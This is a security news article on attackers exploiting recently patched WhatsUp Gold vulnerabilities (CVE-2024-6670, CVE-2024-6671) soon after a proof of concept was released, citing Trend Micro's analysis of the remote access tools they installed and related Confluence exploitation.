Malicious actors may be leveraging publicly available proof-of-concept (PoC) exploits for recently disclosed security flaws in Progress Software WhatsUp Gold to carry out opportunistic attacks.
The campaign is said to have begun on August 30, 2024, just five hours after Summoning Team security researcher Sina Kheirkhah released a PoC for CVE-2024-6670 (CVSS score: 9.8), who is also known for discovering and reporting CVE-2024-6671 (CVSS score: 9.8).
Both critical vulnerabilities, which could have allowed unauthenticated attackers to obtain users’ encrypted passwords, were patched by Progress in mid-August 2024.
“The timeline of events indicates that even though patches were available, some organizations failed to apply them quickly enough, leading to incidents shortly after the PoC was released,” Trend Micro researchers Hitomi Kimura and Maria Emreen Belay said in an analysis on Thursday.
The attacks observed by the cybersecurity firm include bypassing WhatsUp Gold authentication and exploiting Active Monitor PowerShell scripts to ultimately download various remote access tools to gain persistence on the Windows host.
This includes Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote, with both Atera Agent and Splashtop Remote installed by a single MSI installer file retrieved from a remote server.
“WhatsUp Gold’s executable polling process, NmPoller.exe, appears to be capable of hosting a script called Active Monitor PowerShell Script as a legitimate function,” the researchers explained. “The threat actors in this case chose to do this to perform remote arbitrary code execution.”
No further exploitation has been detected, however the use of multiple remote access software suggests a ransomware actor is responsible.
This is the second time a WhatsUp Gold security vulnerability has been weaponized in the wild: Early last month, the Shadowserver Foundation announced that it had seen exploitation attempts against CVE-2024-4885 (CVSS score: 9.8), another critical bug that was resolved by Progress in June 2024.
This disclosure comes a few weeks after Trend Micro revealed that threat actors were exploiting a security flaw in Atlassian’s Confluence Data Center and Confluence Server (CVE-2023-22527, CVSS score: 10.0) to deliver the Godzilla web shell. The vulnerability has since been patched.
“The CVE-2023-22527 vulnerability continues to be widely exploited by a variety of threat actors who leverage this vulnerability to carry out malicious activities, posing a significant security risk to organizations worldwide,” the company said.
